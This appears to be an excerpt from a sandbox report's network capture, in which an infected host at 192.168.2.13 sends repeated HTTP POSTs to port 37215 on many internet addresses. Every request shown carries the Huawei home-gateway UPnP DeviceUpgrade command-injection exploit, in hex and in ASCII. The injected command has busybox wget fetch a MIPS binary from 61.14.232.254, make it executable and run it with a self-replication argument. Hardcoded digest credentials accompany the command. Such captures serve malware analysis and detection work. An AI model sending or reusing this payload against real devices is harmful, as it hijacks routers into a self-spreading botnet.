                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1137192.168.2.1354846157.171.75.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507395983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1138192.168.2.1342944124.189.180.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.507422924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1139192.168.2.1336760197.63.162.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.516904116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1140192.168.2.1348210157.117.225.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.516928911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1141192.168.2.1360778152.73.75.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517221928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1142192.168.2.135463041.90.27.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517254114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1143192.168.2.1340480197.132.136.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517283916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1144192.168.2.133314041.35.78.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517376900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1145192.168.2.135465224.245.161.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517395020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1146192.168.2.1344946131.165.179.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.517451048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 